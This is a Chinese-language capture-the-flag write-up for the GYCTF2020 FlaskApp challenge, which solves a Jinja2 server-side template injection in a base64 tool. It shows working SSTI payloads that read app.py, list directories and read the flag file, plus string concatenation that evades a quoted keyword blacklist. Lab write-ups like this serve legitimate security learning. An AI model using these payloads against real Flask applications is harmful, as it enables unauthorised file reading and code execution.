[GYCTF2020]FlaskApp
开始打开这个靶场,发现这是一个加解密的应用,我们可以进行base64加解密,开始寻找网页的源代码,使用脚本扫描目录文件也没有什么发现,查看应用的网页源代码也没有发现。之前所解的一道题是一个基于flask框架的SSRF,然后就疯狂在输入框里面输入命令,看看有什么命令是执行的,试了几次之后发现有这样一个过程。我试了试{{3+7}}这种简单的注入测试发现加密的结果是10的base64加密,那这样子肯定是存在一个命令执行漏洞的(存在SSTI漏洞),之后的注入当中发现在输入任意字符的时,解密会出现报错也就是flask的debug模式,也就是会提示我们的报错点,也就找到代码泄露。
加法的结果
出现代码泄露
查看所有的代码泄露发现就这一行是有传递的一些价值,也就说我们输入的text会被获取然后进行解密,之后还是有一步就是如果我们解码出的语句如果可以过waf则执行解码的代码。这就可以解释之前为什么会出现的加法的结果。
然后我们便开始使用命令执行注入看看有没有什么新的发现,然后想直接查看这个APP的源代码
使用下面这个,现在加密中进行加密,在放到解密中进行执行
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}
通过这个源码我们的可以模糊地看到黑名单中有:
black_list = ["flag","os","system","
popen","import","eval","chr"
,"request", "subprocess" ,"
commands","socket","hex","
base64","*","?"
那么既然如此我们就使用命令执行打开当前网页地目录看看有哪些文件
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
存在的目录:
也就是说我只需要通过字符窜拼接绕过黑名单即可读取到这个文件里面的flag,
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_f'+'lag.txt','r').read()}}{% endif %}{% endfor %}
加密解密后得到: